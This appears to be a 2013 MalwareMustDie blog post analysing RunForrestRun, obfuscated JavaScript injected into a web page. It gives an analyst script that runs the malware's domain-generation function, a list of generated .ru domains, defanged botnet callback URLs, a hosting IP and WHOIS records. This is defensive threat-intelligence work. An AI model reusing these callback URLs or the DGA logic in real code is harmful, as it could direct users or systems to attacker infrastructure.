Content-Length: 3325227
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
  :
200 OK
Registered socket 1896 for persistent reuse.
Length: 3325227 (3.2M) [text/html]
Saving to: `index.html'
100%[============================>] 3,325,227    103K/s   in 39s
2013-11-02 17:07:35 (83.0 KB/s) - `index.html' saved [3325227/3325227]
This is the real worst case of code injection, the index html was injected more than 50 times with the obfuscation javascript code, sample is here with password=infected -->>[MMD Mediafire]. Obfuscation method used is improved as per marked parts below by trying to make gesture of the script used in Google Analytics:

The first decoding process can e viewed here -->>[MMD Pastebin]
And the result is as per below well-known DGA code:

Which is completely equal code to our case posted on July 23, 2013 here-->>[MMD PREV.POST]

So, we saw the RunForrestRun for almost one year and the logic haven't changed a bit. Just in case someone will meet with the similar case or codes in the future hereby I made simple script for you to use if you see one, as per snipped GOOD code and a "howto" below: 

// manual crack...@unixfreaxjp
// erase the setTimeout(function () all of it, we don't need those mess..
// and replace with the below code...
// (make sure you include the rest of the functions..)
// The code :

var nextday = new Date();
nextday.setFullYear(2013);
for (var yyy=0;yyy<13;yyy++)
  { nextday.setMonth(yyy);
for (var xxx= 1;xxx<33;xxx++)
     {    
      var unix = Math.round(nextday.setDate(xxx)/1000);
      var domainName = generatePseudoRandomString(unix, 16, 'ru');
      document.write(xxx+" | "+domainName+ "  |  "+nextday+"\n"); }}
Using the script above you can extract the domains per dates as per snipped below: 
 1 | oxkjnvhjnvnegtyb.ru  |  Tue Oct 01 2013 17:36:40 GMT+0900
 2 | bloxgsfzinxmdspt.ru  |  Wed Oct 02 2013 17:36:40 GMT+0900
 3 | mxpgggggukxqteoy.ru  |  Thu Oct 03 2013 17:36:40 GMT+0900
 4 | yjsovtnpgbwqcbbd.ru  |  Fri Oct 04 2013 17:36:40 GMT+0900
 5 | lwtcxuzbdrsnpqfb.ru  |  Sat Oct 05 2013 17:36:40 GMT+0900
 6 | xiwlnutkxsqxwjge.ru  |  Sun Oct 06 2013 17:36:40 GMT+0900
 7 | kwyyhhqtwxupnhyu.ru  |  Mon Oct 07 2013 17:36:40 GMT+0900
 8 | wicjgufeimlbmcus.ru  |  Tue Oct 08 2013 17:36:40 GMT+0900
 9 | ivewawjppavmkhwx.ru  |  Wed Oct 09 2013 17:36:40 GMT+0900
10 | uihgxtcniyolbobp.ru  |  Thu Oct 10 2013 17:36:40 GMT+0900
11 | hvitmnanuzbabudp.ru  |  Fri Oct 11 2013 17:36:40 GMT+0900
12 | thldkvcgbkzcbfxw.ru  |  Sat Oct 12 2013 17:36:40 GMT+0900
13 | gunqeyhnrhskxjdr.ru  |  Sun Oct 13 2013 17:36:40 GMT+0900
14 | shqyztdrsofsjnib.ru  |  Mon Oct 14 2013 17:36:40 GMT+0900
15 | eusngyfurlziprua.ru  |  Tue Oct 15 2013 17:36:40 GMT+0900
((snipped))
with the complete list of 709 days extracted here --->>[MMD PASTEBIN]

And by our useful tools here--->>[MMD Google Code] and following the DGA Procedure Wiki here-->>[MMD Wiki], I came to result the below domains are activated NOW: (format: domain, IP, DNS, and DATE): 

yalkzsvudybexfgd.ru, 91.233.244.102, dns1.webdrive.ru.,dns2.webdrive.ru. | Apr 16 
lomxtgmgrswlgrrn.ru, 91.233.244.102, dns1.webdrive.ru.,dns2.webdrive.ru. | Apr 17 
wzbdwenwshfzglwt.ru, 91.233.244.102, dns1.webdrive.ru.,dns2.webdrive.ru. | Aug 17 
jnfrqmekhoevppvw.ru, 91.233.244.102, dns1.webdrive.ru.,dns2.webdrive.ru. | Aug 18 
vygzhvfiuommkqfj.ru, 91.233.244.102, dns1.webdrive.ru.,dns2.webdrive.ru. | Aug 19 
imjosxuhbcdonrco.ru, 91.233.244.102, dns1.webdrive.ru.,dns2.webdrive.ru. | Aug 20 
bhigmqckbqhleqlo.ru, 91.233.244.102, dns1.webdrive.ru.,dns2.webdrive.ru. | Nov 06 
nsjosicxuhpidhlp.ru, 91.233.244.102, dns1.webdrive.ru.,dns2.webdrive.ru. | Nov 07
And also found the below domains are blocked/sinkholed: 
gatrxzmokglyvnqh.ru, 195.22.26.253, 195.22.26.254, ns1.csof.net. ns2.csof.net.
smvydqivtigcadxb.ru, 195.22.26.253, 195.22.26.254, ns1.csof.net. ns2.csof.net.
I can say the reputation in IP: 91.233.244.102 is not good:
Virus Total history (with thank's!) -->>[HERE]
URLQuery records (many thank's) -->>[URLQuery]

Sometimes the bad guys has a unique ways to greet us! :-))

Below are bad URLs that can be switched alive: 

h00p://yalkzsvudybexfgd.ru/runforestrun?sid=botnet2
h00p://lomxtgmgrswlgrrn.ru/runforestrun?sid=botnet2
h00p://wzbdwenwshfzglwt.ru/runforestrun?sid=botnet2
h00p://jnfrqmekhoevppvw.ru/runforestrun?sid=botnet2
h00p://vygzhvfiuommkqfj.ru/runforestrun?sid=botnet2
h00p://imjosxuhbcdonrco.ru/runforestrun?sid=botnet2
h00p://bhigmqckbqhleqlo.ru/runforestrun?sid=botnet2
h00p://nsjosicxuhpidhlp.ru/runforestrun?sid=botnet2
Just in case I recorded them all in URLQuery (Thank's guys!): 
http://urlquery.net/report.php?id=7388672
http://urlquery.net/report.php?id=7388677
http://urlquery.net/report.php?id=7388681
http://urlquery.net/report.php?id=7388683
http://urlquery.net/report.php?id=7388687
http://urlquery.net/report.php?id=7388692
http://urlquery.net/report.php?id=7388694
http://urlquery.net/report.php?id=7388701
Those detected domains, are all activated in REGGI.RU of Russia Federation: 
domain:        YALKZSVUDYBEXFGD.RU
nserver:       dns1.webdrive.ru.
nserver:       dns2.webdrive.ru.
state:         REGISTERED, DELEGATED, UNVERIFIED
person:        Private Person
registrar:     REGGI-REG-RIPN
admin-contact: https://panel.reggi.ru/user/whois/webmail/
created:       2013.04.15
paid-till:     2014.04.15
free-date:     2014.05.16
source:        TCI
Last updated on 2013.11.02 13:21:36 MSK

domain:        LOMXTGMGRSWLGRRN.RU
nserver:       dns1.webdrive.ru.
nserver:       dns2.webdrive.ru.
state:         REGISTERED, DELEGATED, UNVERIFIED
person:        Private Person
registrar:     REGGI-REG-RIPN
admin-contact: https://panel.reggi.ru/user/whois/webmail/
created:       2013.04.15
paid-till:     2014.04.15
free-date:     2014.05.16
source:        TCI
Last updated on 2013.11.02 13:21:36 MSK

domain:        WZBDWENWSHFZGLWT.RU
nserver:       dns1.webdrive.ru.
nserver:       dns2.webdrive.ru.
state:         REGISTERED, DELEGATED, UNVERIFIED
person:        Private Person
registrar:     REGGI-REG-RIPN
admin-contact: https://panel.reggi.ru/user/whois/webmail/
created:       2013.08.16
paid-till:     2014.08.16
free-date:     2014.09.16
source:        TCI
Last updated on 2013.11.02 13:21:36 MSK

domain:        JNFRQMEKHOEVPPVW.RU
nserver:       dns1.webdrive.ru.
nserver:       dns2.webdrive.ru.
state:         REGISTERED, DELEGATED, UNVERIFIED
person:        Private Person
registrar:     REGGI-REG-RIPN
admin-contact: https://panel.reggi.ru/user/whois/webmail/
created:       2013.08.16
paid-till:     2014.08.16
free-date:     2014.09.16
source:        TCI
Last updated on 2013.11.02 13:26:32 MSK

domain:        VYGZHVFIUOMMKQFJ.RU
nserver:       dns1.webdrive.ru.
nserver:       dns2.webdrive.ru.
state:         REGISTERED, DELEGATED, UNVERIFIED
person:        Private Person
registrar:     REGGI-REG-RIPN
admin-contact: https://panel.reggi.ru/user/whois/webmail/
created:       2013.08.16
paid-till:     2014.08.16
free-date:     2014.09.16
source:        TCI
Last updated on 2013.11.02 13:26:32 MSK

domain:        IMJOSXUHBCDONRCO.RU
nserver:       dns1.webdrive.ru.
nserver:       dns2.webdrive.ru.
state:         REGISTERED, DELEGATED, UNVERIFIED
person:        Private Person
registrar:     REGGI-REG-RIPN
admin-contact: https://panel.reggi.ru/user/whois/webmail/
created:       2013.08.16
paid-till:     2014.08.16
free-date:     2014.09.16
source:        TCI
Last updated on 2013.11.02 13:26:32 MSK

domain:        BHIGMQCKBQHLEQLO.RU
nserver:       dns1.webdrive.ru.
nserver:       dns2.webdrive.ru.
state:         REGISTERED, DELEGATED, UNVERIFIED
person:        Private Person
registrar:     REGGI-REG-RIPN
admin-contact: https://panel.reggi.ru/user/whois/webmail/
created:       2012.11.06
paid-till:     2013.11.06
free-date:     2013.12.07
source:        TCI
Last updated on 2013.11.02 13:31:37 MSK

domain:        NSJOSICXUHPIDHLP.RU
nserver:       dns1.webdrive.ru.
nserver:       dns2.webdrive.ru.
state:         REGISTERED, DELEGATED, UNVERIFIED
person:        Private Person
registrar:     REGGI-REG-RIPN
admin-contact: https://panel.reggi.ru/user/whois/webmail/
created:       2012.11.06
paid-till:     2013.11.06
free-date:     2013.12.07
source:        TCI
Last updated on 2013.11.02 13:31:37 MSK
And the IP information also pointed to St. Petersburg IDC: 
$ whois 91.233.244.102

% Information related to '91.233.244.0 - 91.233.245.255'

inetnum:        91.233.244.0 - 91.233.245.255
netname:        OLBORG-NET
descr:          Olborg Ltd
descr:          St.Petersburg
country:        RU
admin-c:        OLCR1-RIPE
tech-c:         OLCR1-RIPE
status:         ASSIGNED PI
mnt-by:         OLBORG-MNT
mnt-by:         RIPE-NCC-END-MNT
mnt-routes:     OLBORG-MNT
mnt-domains:    OLBORG-MNT
source:         RIPE # Filtered

role:           Olborg Ltd - Contact Role
address:        Olborg Ltd
address:        St.Petersburg, Russia
abuse-mailbox:  abuse@o1host.net
remarks:        *************************************************
remarks:        * For spam/abuse/security issues please contact *
remarks:        *    abuse@o1host.net ,  not  this  address     *
remarks:        *************************************************
org:            ORG-OL89-RIPE
admin-c:        AK8017-RIPE
tech-c:         AK8017-RIPE
nic-hdl:        OLCR1-RIPE
mnt-by:         OLBORG-MNT
source:         RIPE # Filtered

% Information related to '91.233.244.0/23AS57636'

route:          91.233.244.0/23
descr:          Olborg Ltd.
origin:         AS57636
mnt-by:         OLBORG-MNT
source:         RIPE # Filtered
I really hope to see all domains in this logic blocked.. otherwise they sure will come again with a much better obfuscation.

#MalwareMustDie!!

Viewing all 151 articles
Browse latest View live
Search